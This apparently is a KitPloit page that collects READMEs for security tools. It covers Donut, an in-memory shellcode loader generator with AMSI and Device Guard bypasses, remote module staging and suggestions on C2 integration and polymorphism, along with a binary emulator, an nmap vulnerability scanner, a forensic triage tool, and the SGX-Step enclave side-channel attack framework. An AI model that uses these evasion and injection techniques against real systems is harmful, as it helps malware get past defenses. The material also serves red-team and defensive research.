Channel: KitPloit - PenTest Tools!

Donut - Generates X86, X64, Or AMD64+x86 Position-Independent Shellcode That Loads .NET Assemblies, PE Files, And Other Windows Payloads From Memory


Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, and DLL (including .NET Assembly) files. This shellcode can be injected into an arbitrary Windows process for in-memory execution. Given a supported file type, parameters, and, where applicable, an entry point (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. .NET Assemblies are loaded into a new Application Domain, allowing them to run in disposable AppDomains.
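Counter (CTR) mode makes encryption and decryption the same XOR against a keystream, so only a holder of the random 128-bit key can recover the module. A minimal Python sketch of that idea, using a SHA-256-based keystream as a stand-in for Chaskey (the real cipher, nonce handling, and block layout in donut differ):

```python
import hashlib
import os

def ctr_keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Generate `length` keystream bytes by hashing key||nonce||counter.

    Stand-in PRF for illustration only; donut itself uses Chaskey here."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "little")).digest()
        counter += 1
    return out[:length]

def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: CTR mode is its own inverse."""
    ks = ctr_keystream(key, nonce, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))

key = os.urandom(16)        # 128-bit randomly generated key, as donut uses
nonce = os.urandom(16)
module = b"MZ\x90\x00"      # placeholder bytes for an embedded module
blob = ctr_crypt(key, nonce, module)
assert ctr_crypt(key, nonce, blob) == module  # same key recovers the module
```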
It can be used in several ways.

As a Standalone Tool
Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for loader generation. The Python documentation can be found here. The command-line syntax is as described below.
 usage: donut [options] -f <EXE/DLL/VBS/JS>

-MODULE OPTIONS-

-f <path> .NET assembly, EXE, DLL, VBS, JS file to execute in-memory.
-n <name> Module name. Randomly generated by default.
-u <URL> HTTP server that will host the donut module.

-PIC/SHELLCODE OPTIONS-

-a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86 (default).
-b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail (default).
-o <loader> Output file. Default is "loader.bin".
-e Encode output file with Base64. (Will be copied to clipboard on Windows)
-t Run entrypoint for unmanaged EXE as a new thread. (replaces ExitProcess with ExitThread in IAT)
-x Call RtlExitUserProcess to terminate the host process. (RtlExitUserThread is called by default)

-DOTNET OPTIONS-

-c <namespace.class> Optional class name. (required for .NET DLL)
-m <method | api> Optional method or API name for DLL. (a method is required for .NET DLL)
-p <parameters> Optional parameters inside quotations.
-r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
-d <name> AppDomain name to create for .NET. Randomly generated by default.

examples:

donut -f c2.dll
donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
donut -f loader.dll -c TestClass -m RunProcess -p"calc notepad" -u http://remote_server.com/modules/

Building Donut
Tags have been provided for each release version of donut that contain the compiled executables.
However, you may also clone and build the source yourself using the provided makefiles.

Building From Repository
From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
git clone http://github.com/thewover/donut
cd donut

Linux
Simply run make to generate an executable, a static library, and a dynamic library.
make
make clean
make debug

Windows
Start a Microsoft Visual Studio Developer Command Prompt and cd to donut's directory. The Microsoft (non-gcc) Makefile can be specified with -f Makefile.msvc. The makefile provides the following commands to build donut:
nmake -f Makefile.msvc
nmake clean -f Makefile.msvc
nmake debug -f Makefile.msvc

As a Library
donut can be compiled as both dynamic and static libraries for both Linux (.a / .so) and Windows (.lib / .dll). It has a simple API that is described in docs/api.html. Two exported functions are provided: int DonutCreate(PDONUT_CONFIG c) and int DonutDelete(PDONUT_CONFIG c).

As a Python Module
Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
pip install .
Otherwise, you may install Donut as a Python module by grabbing it from the PyPI repository.
pip install donut-shellcode

As a Template - Rebuilding the shellcode
loader/ contains the in-memory execution code for EXE/DLL/VBS/JS and .NET assemblies, which should compile successfully with both Microsoft Visual Studio and MinGW-w64. Makefiles have been provided for both compilers. Whenever files in the loader directory have been changed, recompiling for all architectures is recommended before rebuilding donut.

Microsoft Visual Studio
Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.
Open the x64 Microsoft Visual Studio build environment, switch to the loader directory, and type the following:
nmake clean -f Makefile.msvc
nmake -f Makefile.msvc
This should generate a 64-bit executable (loader.exe) from loader.c. exe2h will then extract the shellcode from the .text segment of the PE file and save it as a C array to loader_exe_x64.h. When donut is rebuilt, this new shellcode will be used for all loaders that it generates.
To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the loader directory, and type the following:
nmake clean -f Makefile.msvc
nmake x86 -f Makefile.msvc
This will save the shellcode as a C array to loader_exe_x86.h.
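The exe2h step is essentially a bytes-to-C-array conversion over the extracted .text section. A rough Python illustration of the output format (the real exe2h is written in C and parses the PE headers; the array name and column width here are just examples):

```python
def to_c_array(name: str, data: bytes, cols: int = 12) -> str:
    """Render raw bytes as a C unsigned char array, exe2h-style."""
    lines = []
    for i in range(0, len(data), cols):
        chunk = ", ".join(f"0x{b:02x}" for b in data[i:i + cols])
        lines.append("  " + chunk)
    body = ",\n".join(lines)
    return (f"unsigned char {name}[] = {{\n{body}}};\n"
            f"unsigned int {name}_len = {len(data)};\n")

# e.g. the first bytes of a compiled loader's .text section
print(to_c_array("loader_exe_x86", b"\x55\x8b\xec\x90"))
```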

MinGW-W64
Assuming you're on Linux and MinGW-W64 has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the loader directory and type the following:
make clean -f Makefile.mingw
make -f Makefile.mingw
Once you've recompiled for all architectures, you may rebuild donut.

Bypasses
Donut includes a bypass system for AMSI and other security features. Currently we bypass:
  • AMSI in .NET v4.8
  • Device Guard policy preventing dynamically generated code from executing
You may customize our bypasses or add your own. The bypass logic is defined in loader/bypass.c.
Each bypass implements the DisableAMSI function with the signature BOOL DisableAMSI(PDONUT_INSTANCE inst) and comes with a corresponding preprocessor directive. We have several #if defined blocks that check for definitions; each block implements the same bypass function. For instance, our first bypass is called BYPASS_AMSI_A. If donut is built with that symbol defined, then that bypass will be used.
Why do it this way? Because it means that only the bypass you are using is built into loader.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an #if defined block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
Odzhan wrote a blog post on the details of our AMSI bypass research.

Additional features
These are left as exercises to the reader. I would personally recommend:
  • Add environmental keying
  • Make donut polymorphic by obfuscating loader every time shellcode is generated
  • Integrate donut as a module into your favorite RAT/C2 Framework

Disclaimers
  • No, we will not update donut to counter signatures or detections by any AV.
  • We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.

How it works

Procedure for Assemblies
Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
The logic above describes how the shellcode generated by donut works. That logic is defined in loader.exe. To get the shellcode, exe2h extracts the compiled machine code from the .text segment in loader.exe and saves it as a C array to a C header file. donut combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
Refer to MSDN for documentation on the Unmanaged CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.

Procedure for ActiveScript/XSL
The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a blog post.

Procedure for PE Loading
The details of how Donut loads PE files from memory have been detailed by Odzhan in a blog post.
Only PE files with relocation information (.reloc) are supported. TLS callbacks are only executed upon process creation.

Components
Donut contains the following elements:
  • donut.c: The source code for the donut loader generator.
  • donut.exe: The compiled loader generator as an EXE.
  • donut.py: The donut loader generator as a Python script (planned for version 1.0)
  • donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
  • setup.py: The setup file for installing Donut as a Pip Python3 module.
  • lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform.
  • lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform.
  • lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project.
  • loader/loader.c: Main file for the shellcode.
  • loader/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
  • loader/inmem_pe.c: In-Memory loader for EXE/DLL files.
  • loader/inmem_script.c: In-Memory loader for VBScript/JScript files.
  • loader/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
  • loader/wscript.c: Supports a number of WScript methods that cscript/wscript support.
  • loader/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP).
  • loader/http_client.c: Downloads a module from remote staging server into memory.
  • loader/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
  • loader/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
  • loader/inject.exe: The compiled C shellcode injector.
  • loader/inject.c: A C shellcode injector that injects loader.bin into a specified process for testing.
  • loader/runsc.c: A C shellcode runner for testing loader.bin in the simplest manner possible.
  • loader/runsc.exe: The compiled C shellcode runner.
  • loader/exe2h/exe2h.c: Source code for exe2h.
  • loader/exe2h/exe2h.exe: Extracts the useful machine code from loader.exe and saves as array to C header file.
  • encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
  • hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
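API hashing of the kind peb.c relies on resolves imports by comparing hashes of export names rather than plaintext strings, and Davies-Meyer turns a block cipher E into a compression function: H' = E_m(H) XOR H. A hedged sketch of the construction, with a toy 64-bit ARX mixer standing in for Speck (Maru's real rounds, padding, and parameters differ):

```python
MASK64 = (1 << 64) - 1

def toy_block_cipher(key_block: bytes, state: int) -> int:
    """Stand-in for the Speck 64-bit block cipher used by Maru."""
    k = int.from_bytes(key_block.ljust(8, b"\x00")[:8], "little")
    v = state
    for _ in range(8):  # a few ARX-style mixing rounds
        v = (v + k) & MASK64
        v ^= ((v << 13) | (v >> 51)) & MASK64     # rotate-xor diffusion
        v = (v * 0x9E3779B97F4A7C15) & MASK64     # odd-constant multiply
    return v

def maru_like_hash(api_name: str, iv: int = 0x6A09E667F3BCC908) -> int:
    """Davies-Meyer: absorb the name in 8-byte blocks used as cipher keys."""
    data = api_name.encode() + b"\x00"
    h = iv
    for i in range(0, len(data), 8):
        h = toy_block_cipher(data[i:i + 8], h) ^ h
    return h

# A loader would walk a module's export table and compare hashes
# instead of strings:
target = maru_like_hash("LoadLibraryA")
exports = ["CreateFileA", "LoadLibraryA", "VirtualAlloc"]
resolved = [e for e in exports if maru_like_hash(e) == target]
```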

Subprojects
There are three companion projects provided with donut:
  • DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
  • DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
  • ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
  • ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.

Project plan
  • Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.
  • Create a C# version of the generator.
  • Create a donut.py generator that uses the same command-line parameters as donut.exe.
  • Add support for HTTP proxies.
  • Find ways to simplify the shellcode if possible.
  • Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design loaders that work with it.
  • Dynamic Calls to DLL functions.
  • Handle the ProcessExit event from AppDomain using unmanaged code.



Sojobo - A Binary Analysis Framework


Sojobo is an emulator for the B2R2 framework. It was created to ease the analysis of potentially malicious files. It is developed entirely in .NET, so you don't need to install or compile any other external libraries (the project is self-contained).
With Sojobo you can:
  • Emulate a (32 bit) PE binary
  • Inspect the memory of the emulated process
  • Read the process state
  • Display a disassembly of the executed code
  • Emulate functions in a managed language (C# || F#)

Using Sojobo
Sojobo is intended to be used as a framework for creating program analysis utilities. Various sample utilities are included to show how to use the framework effectively.

Tengu
Tengu is a utility based on Sojobo. It emulates a given process and controls its execution through a debugger-like UI (inspired in particular by the windbg debugger).

Documentation
The project is fully documented in F# (cit.) :) Joking apart, I plan to write some blog posts on how to use Sojobo. Below is a list of the current posts:
You can also read the API documentation.

Compile
In order to compile Sojobo you need .NET Core and Visual Studio installed. To compile, just run build.bat.


Vscan - Vulnerability Scanner Tool Using Nmap And Nse Scripts


Vscan is a vulnerability scanner that uses Nmap and NSE scripts to find vulnerabilities.
This tool adds value to vulnerability scanning with nmap by using NSE scripts, which add flexibility in terms of vulnerability detection and exploitation. Below are some of the features that NSE scripts provide:
  • Network discovery
  • More sophisticated version detection
  • Vulnerability detection
  • Backdoor detection
  • Vulnerability exploitation

This tool uses the path /usr/share/nmap/scripts/, where the NSE scripts are located on Kali Linux.
The tool performs the following:
  • checks communication with the target hosts by sending ICMP echo requests
  • takes a protocol name such as http as input and executes all NSE scripts related to that protocol
  • if any vulnerability is triggered, it saves the output to a log file
  • it can perform all of the above actions for a range of IP addresses
If the tool finds a vulnerability in a certain protocol (e.g. http), it keeps the output in a log file created and saved in the following location: /home/vulnerabilities_enumeration/http_vulnerabilities/http_vulnerabilities/http_vulnerabilities.txt. In this example the folders have been created using the protocol prefix, which in this case is the http protocol.
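The per-protocol script selection can be expressed with nmap's --script wildcard matching (a real nmap option); a hypothetical Python sketch of the command the script effectively builds, with the optional Pn flag from the usage below:

```python
import shlex

def build_nmap_command(target: str, protocol: str, port: str,
                       skip_ping: bool = False) -> str:
    """Run every NSE script whose name starts with the protocol prefix,
    e.g. protocol 'http' matches http-vuln-*, http-enum, and so on."""
    cmd = ["nmap", "--script", f"{protocol}-*", "-p", port]
    if skip_ping:
        cmd.append("-Pn")  # skip the ICMP host-discovery check
    cmd.append(target)
    return " ".join(shlex.quote(c) for c in cmd)

print(build_nmap_command("192.168.162.90", "http", "80"))
```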

Usage:
[Usage:] ./vscan.sh <ip_range> <protocol> <port> <Pn (optional)>
[Usage:] ./vscan.sh <ips_file> <protocol> <port> <Pn (optional)>
[Usage:] ./vscan.sh <ip> <protocol> <port> <Pn (optional)>

How to run:
./vscan.sh 192.168.162.90 http 80
./vscan.sh 192.168.162.10-90 http 80
./vscan.sh 192.168.162.90 ssh 22 Pn
./vscan.sh IPs.txt smb 445

Screenshots:
Example: SMB scanning


 Example: Slowloris vulnerability detection


Example: multiple IP scanning SSH weak keys


Example: When the system is down or no ICMP requests



DFIRtriage - Digital Forensic Acquisition Tool For Windows Based Incident Response


DFIRtriage is a tool intended to provide incident responders with rapid host data. Written in Python, the code has been compiled to eliminate the dependency on Python on the target host. The tool runs a variety of commands automatically upon execution. The acquired data will reside in the root of the execution directory. DFIRtriage may be run from a USB drive or executed in a remote shell on the target. Windows-only support.

What’s New?
*General
  • Efficiency updates were made to the code improving flow, cleaning up bugs, and providing performance improvements.
  • Cleaned up the output directory structure
  • Removed TZworks tools from toolset avoiding licensing issues
  • Added commandline arguments for new functionality (run "DFIRtriage --help" for details)
*Memory acquisition
  • memory is now acquired by default
  • argument required to bypass memory acquisition
  • free space check conducted prior to acquiring memory
  • updated acquisition process to avoid Windows 10 crashes
*New artifacts
  • windowsupdate.log file
  • Windows Defender scan logs
  • PowerShell command history
  • HOSTS files
  • netstat output now includes associated PID for all network connections
  • logging all users currently logged in to the target machine to the Triage_info.txt file
  • Pulling dozens of new events from the Windows Event logs
*New! DFIRtriage search tool
  • Conducts keyword search across DFIRtriage output data and writes findings to log file
  • The search tool is a separate executable (dtfind.exe)
  • Double-click to run or run from the command line (e.g. dtfind -kw badstuff.php)
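A keyword sweep like dtfind's can be sketched in a few lines of Python (dtfind itself is a compiled executable; this merely mirrors the search-and-log behavior described above):

```python
import os

def keyword_search(root: str, keyword: str):
    """Walk the output tree and record (path, line number, line) hits,
    case-insensitively, dtfind-style."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as f:
                    for lineno, line in enumerate(f, 1):
                        if keyword.lower() in line.lower():
                            hits.append((path, lineno, line.rstrip()))
            except OSError:
                continue  # skip unreadable files
    return hits

# Usage: findings could then be written to a log file, e.g.
# for hit in keyword_search("DFIRtriage_output", "badstuff.php"): print(hit)
```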

Dependencies
The tool repository contains the full toolset required for proper execution, packed into a single file named “core.ir”. This “.ir” file is the only required dependency of DFIRtriage when running in Python and should reside in a directory named data (i.e. "./data/core.ir"). The compiled version of DFIRtriage has the full toolset embedded and does not require the "./data/core.ir" file. NOTE: TZWorks utilities are no longer utilized.

Contents
  • DFIRtriage.exe
    • compiled executable
  • .\data\core.ir
    • tool set repository (required for Python version only)
  • manifest.txt
    • file hashes for core components
  • unlicense.txt
    • copy of license agreement
  • source directory
    • DFIRtriage-v4-pub.py
  • dtfind.exe
    • compiled search tool executable

Operation
DFIRtriage acquires data from the host on which it is executed. For acquisitions of remote hosts, the DFIRtriage files will need to be copied to the target, then executed via remote shell (i.e. SSH or PSEXEC).

PSEXEC Usage
WARNING: Do not use PSEXEC arguments to pass credentials to a remote system for authentication. Doing so will send your username and password across the network in the clear.
The following steps should be taken for proper usage of PSEXEC:
  1. Map a network drive and authenticate with an account that has local administrative privileges on the target host. You can use this mapped connection to copy DFIRtriage to the target.
  2. Shovel a remote shell to the target host using PSEXEC:
    psexec \\target_host cmd
  3. You now have a remote shell on the target. All commands executed at this point are done so on the target host.
Usage
  1. Once the remote shell has been established on the target you can change directory to the location of the extracted DFIRtriage.exe file and execute.
  2. Memory acquisition occurs by default, no arguments needed. To bypass memory acquisition, the "--nomem" argument can be passed.
  3. DFIRtriage must be executed with Administrative privileges.

Output Analysis
Once complete, press Enter to clean up the output directory. If running the executable, the only data remaining will be a zipped archive of the output as well as DFIRtriage.exe. If running the Python code directly, only DFIRtriage-v4-pub.py and a zipped archive of the output are left.

Output Folder
The output folder name includes the target hostname and a date/time code indicating when DFIRtriage was executed. The date/time code format is YYYYMMDDHHMMSS.
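For reference, the date/time code can be produced with a strftime pattern; a sketch of the naming convention (the hostname helper and the exact separator between hostname and timestamp are assumptions, not taken from DFIRtriage's source):

```python
import datetime
import socket

def output_folder_name(hostname: str = None,
                       now: datetime.datetime = None) -> str:
    """Build '<hostname>-<YYYYMMDDHHMMSS>' as described above; the real
    tool's separator may differ."""
    hostname = hostname or socket.gethostname()
    now = now or datetime.datetime.now()
    return f"{hostname}-{now.strftime('%Y%m%d%H%M%S')}"

print(output_folder_name("WS01", datetime.datetime(2019, 8, 30, 14, 5, 9)))
```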

Artifacts List
The following is a general listing of the information and artifacts gathered.
  • Memory Raw --> image acquisition (optional)
  • Prefetch --> Collects all prefetch files and parses them into a report
  • PowerShell command history --> Gathers PowerShell command history for all users
  • User activity --> HTML report of recent user activity
  • File hash --> MD5 hash of all files in root of System32
  • Network information --> Network configuration, routing tables, etc
  • Network connections --> Established network connections
  • DNS cache entries --> List of complete DNS cache contents
  • ARP table information --> List of complete ARP cache contents
  • NetBIOS information --> Active NetBIOS sessions, transferred files, etc
  • Windows Update Log --> Gathers event tracelog information and builds Windows update log
  • Windows Defender scan log --> Gathers event tracelog information and builds the Windows Defender scan log
  • Windows Event Logs --> Gathers and parses Windows Event Logs
  • Process information --> Processes, PID, and image path
  • List of remotely opened files --> Files on target system opened by remote hosts
  • Local user account names --> List of local user accounts
  • List of hidden directories --> List of all hidden directories on the system partition
  • Alternate Data Streams --> List of files containing alternate data streams
  • Complete file listing --> Full list of all files on the system partition
  • List of scheduled tasks --> List of all configured scheduled tasks
  • Hash of all collected data --> MD5 hash of all data collected by DFIRtriage
  • Installed software --> List of all installed software through WMI
  • Autorun information --> All autorun locations and content
  • Logged on users --> All users currently logged on to target system
  • Registry hives --> Copy of all registry hives
  • USB artifacts --> Collects data needed to parse USB usage info
  • Browser History --> browser history collection from multiple browsers


Sgx-Step - A Practical Attack Framework For Precise Enclave Execution Control


SGX-Step is an open-source framework to facilitate side-channel attack research on Intel SGX platforms. SGX-Step consists of an adversarial Linux kernel driver and user-space library that allow untrusted page table entries and/or x86 APIC timer interrupts to be configured completely from user space. Our research results have demonstrated several new and improved enclaved execution attacks that gather side-channel observations at a maximal temporal resolution (i.e., by interrupting the victim enclave after every single instruction).

Abstract
Trusted execution environments such as Intel SGX hold the promise of protecting sensitive computations from a potentially compromised operating system. Recent research convincingly demonstrated, however, that SGX's strengthened adversary model also gives rise to a new class of powerful, low-noise side-channel attacks leveraging first-rate control over hardware. These attacks commonly rely on frequent enclave preemptions to obtain fine-grained side-channel observations. A maximal temporal resolution is achieved when the victim state is measured after every instruction. Current state-of-the-art enclave execution control schemes, however, do not generally achieve such instruction-level granularity.
This paper presents SGX-Step, an open-source Linux kernel framework that allows an untrusted host process to configure APIC timer interrupts and track page table entries directly from user space. We contribute and evaluate an improved approach to single-step enclaved execution at instruction-level granularity, and we show how SGX-Step enables several new or improved attacks. Finally, we discuss its implications for the design of effective defense mechanisms.
Jo Van Bulck, Frank Piessens, and Raoul Strackx. 2017. SGX-Step: A Practical Attack Framework for Precise Enclave Execution Control. In Proceedings of the 2nd Workshop on System Software for Trusted Execution (SysTEX '17).

Overview
Crucial to the design of SGX-Step, as opposed to previous enclave preemption proposals, is the creation of user-space virtual memory mappings for physical memory locations holding page table entries, as well as for the local APIC memory-mapped I/O configuration registers and the x86 Interrupt Descriptor Table (IDT). This allows an untrusted, attacker-controlled host process to easily (i) track or modify enclave page table entries, (ii) configure the APIC timer one-shot/periodic interrupt source, (iii) trigger inter-processor interrupts, and (iv) register custom interrupt handlers completely within user space.
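Locating the page-table entry for a given enclave virtual address comes down to standard x86-64 4-level paging arithmetic: 9 index bits per level plus a 12-bit page offset. A Python sketch of that address decomposition (libsgxstep does the equivalent in C against the real mapped tables):

```python
def pt_indices(vaddr: int) -> dict:
    """Split a 48-bit x86-64 virtual address into paging-structure indices."""
    return {
        "pml4":   (vaddr >> 39) & 0x1FF,  # bits 47..39
        "pdpt":   (vaddr >> 30) & 0x1FF,  # bits 38..30
        "pd":     (vaddr >> 21) & 0x1FF,  # bits 29..21
        "pt":     (vaddr >> 12) & 0x1FF,  # bits 20..12
        "offset": vaddr & 0xFFF,          # bits 11..0
    }

# Two addresses on the same 4 KiB page share every index but the offset
print(pt_indices(0x7F1234567ABC))
```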


The above figure summarizes the sequence of hardware and software steps when interrupting and resuming an SGX enclave through our framework.
  1. The local APIC timer interrupt arrives within an enclaved instruction.
  2. The processor executes the AEX procedure that securely stores execution context in the enclave’s SSA frame, initializes CPU registers, and vectors to the (user space) interrupt handler registered in the IDT.
  3. At this point, any attack-specific, spy code can easily be plugged in.
  4. The library returns to the user space AEP trampoline. We modified the untrusted runtime of the official SGX SDK to allow easy registration of a custom AEP stub. Furthermore, to enable precise evaluation of our approach on attacker-controlled benchmark debug enclaves, SGX-Step can optionally be instrumented to retrieve the stored instruction pointer from the interrupted enclave’s SSA frame. For this, our /dev/sgx-step driver offers an optional IOCTL call for the privileged EDBGRD instruction.
  5. Thereafter, we configure the local APIC timer for the next interrupt by writing into the initial-count MMIO register, just before executing (6) ERESUME.

Building and Running

0. System Requirements
SGX-Step requires an SGX-capable Intel processor, and an off-the-shelf Linux kernel. Our evaluation was performed on i7-6500U/6700 CPUs, running Ubuntu 16.04 with a stock Linux 4.15.0 kernel. We summarize Linux kernel parameters below.
Linux kernel parameter: Motivation
  • nox2apic: Configure the local APIC device in memory-mapped I/O mode (to make use of SGX-Step's precise single-stepping features).
  • iomem=relaxed, no_timer_check: Suppress unneeded warning messages in the kernel logs.
  • isolcpus=1: Affinitize the victim process to an isolated CPU core.
  • dis_ucode_ldr: Disable CPU microcode updates (Foreshadow/L1TF mitigations may affect the single-stepping interval).
Pass the desired boot parameters to the kernel as follows:
$ sudo vim /etc/default/grub
# GRUB_CMDLINE_LINUX_DEFAULT="quiet splash nox2apic iomem=relaxed no_timer_check isolcpus=1"
$ sudo update-grub && sudo reboot
Finally, in order to reproduce our experimental results, make sure to disable C-States and SpeedStep technology in the BIOS configuration. The table below lists currently supported Intel CPUs, together with their single-stepping APIC timer interval (libsgxstep/config.h).
Model name      CPU        Base frequency   APIC timer interval
Skylake         i7-6700    3.4 GHz          19
Skylake         i7-6500U   2.5 GHz          25
Skylake         i5-6200U   2.3 GHz          28
Kaby Lake R     i7-8650U   1.9 GHz          34
Coffee Lake R   i9-9900K   3.6 GHz          21

1. Patch and install SGX SDK
To enable easy registration of a custom Asynchronous Exit Pointer (AEP) stub, we modified the untrusted runtime of the official Intel SGX SDK. Proceed as follows to checkout linux-sgx v2.6 and apply our patches.
$ git submodule init
$ git submodule update
$ ./install_SGX_driver.sh # tested on Ubuntu 16.04
$ ./patch_sdk.sh
$ ./install_SGX_SDK.sh # tested on Ubuntu 16.04
The above install scripts are tested on Ubuntu 16.04 LTS. For other GNU/Linux distributions, please follow the instructions in the linux-sgx project to build and install the Intel SGX SDK and PSW packages. You will also need to build and load an (unmodified) linux-sgx-driver SGX kernel module in order to use SGX-Step.
Note (local installation). The patched SGX SDK and PSW packages can be installed locally, without affecting a compatible system-wide 'linux-sgx' installation. For this, the example Makefiles support an SGX_SDK environment variable that points to the local SDK installation directory. When detecting a non-default SDK path (i.e., not /opt/intel/sgxsdk), the "run" Makefile targets furthermore dynamically link against the patched libsgx_urts.so untrusted runtime built in the local linux-sgx directory (using the LD_LIBRARY_PATH environment variable).
Note (32-bit support). Instructions for building 32-bit versions of the SGX SDK and SGX-Step can be found in README-m32.md.

2. Build and load /dev/sgx-step
SGX-Step comes with a loadable kernel module that exports an IOCTL interface to the libsgxstep user-space library. The driver is mainly responsible for (i) hooking the APIC timer interrupt handler, (ii) collecting untrusted page table mappings, and optionally (iii) fetching the interrupted instruction pointer for benchmark enclaves.
To build and load the /dev/sgx-step driver, execute:
$ cd kernel
$ make clean load
Note (/dev/isgx). Our driver uses some internal symbols and data structures from the official Intel /dev/isgx driver. We therefore include a git submodule that points to an unmodified v2.1 linux-sgx-driver.
Note (/dev/mem). We rely on Linux's virtual /dev/mem device to construct user-level virtual memory mappings for APIC physical memory-mapped I/O registers and page table entries of interest. Recent Linux distributions typically enable the CONFIG_STRICT_DEVMEM option which prevents such use, however. Our /dev/sgx-step driver therefore includes an approach to bypass devmem_is_allowed checks, without having to recompile the kernel.

3. Build and run test applications
User-space applications can link to the libsgxstep library to make use of SGX-Step's single-stepping and page table manipulation features. Have a look at the example applications in the "app" directory.
For example, to build and run the strlen attack from the paper for a benchmark enclave that processes the secret string 100 repeated times, execute:
$ cd app/bench
$ NUM=100 STRLEN=1 make parse # alternatively vary NUM and use BENCH=1 or ZIGZAG=1
$ # (above command defaults to the Dell Inspiron 13 7359 evaluation laptop machine;
$ # use DESKTOP=1 to build for a Dell Optiplex 7040 machine)
$ # use SGX_SDK=/home/jo/sgxsdk/ for a local SDK installation
$ # use M32=1 to produce a 32-bit executable
The above command builds libsgxstep, the benchmark victim enclave, and the untrusted attacker host process, where the attack scenario and instance size are configured via the corresponding environment variables. The same command also runs the resulting binary non-interactively (to ensure deterministic timer intervals), and finally calls an attack-specific post-processing Python script to parse the resulting enclave instruction pointer benchmark results.
Note (performance). Single-stepping enclaved execution incurs a substantial slowdown. We measured execution times of up to 15 minutes for the experiments described in the paper. SGX-Step's page table manipulation features make it possible to initiate single-stepping only for selected functions, for instance by revoking access rights on specific code or data pages of interest.
Note (timer interval). The exact timer interval value depends on CPU frequency, and hence remains inherently platform-specific. Configure a suitable value in /app/bench/main.c. We established precise timer intervals for our evaluation platforms (see table above) by tweaking and observing the NOP microbenchmark enclave instruction pointer trace results.
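The tuning loop in that last note can be made concrete with a small helper. The sketch below is illustrative only (it is not part of libsgxstep); the trace format and the `classify_trace` helper are assumptions, based on the idea that a single-byte NOP slide advances the enclave instruction pointer by exactly one per single-step:

```python
# Illustrative trace-analysis helper (not part of libsgxstep). Assumes the
# NOP microbenchmark produced a list of enclave RIP samples, one per
# interrupt, and that a single-byte NOP slide advances RIP by exactly 1.
# A well-tuned SGX-Step timer interval maximizes single-steps while keeping
# multi-steps at zero (zero-steps are harmless but waste time).
def classify_trace(rips, step=1):
    counts = {"zero": 0, "single": 0, "multi": 0}
    for prev, cur in zip(rips, rips[1:]):
        delta = cur - prev
        if delta == 0:
            counts["zero"] += 1      # interrupt arrived before any progress
        elif delta == step:
            counts["single"] += 1    # exactly one instruction executed
        else:
            counts["multi"] += 1     # timer fired too late: lost instructions
    return counts

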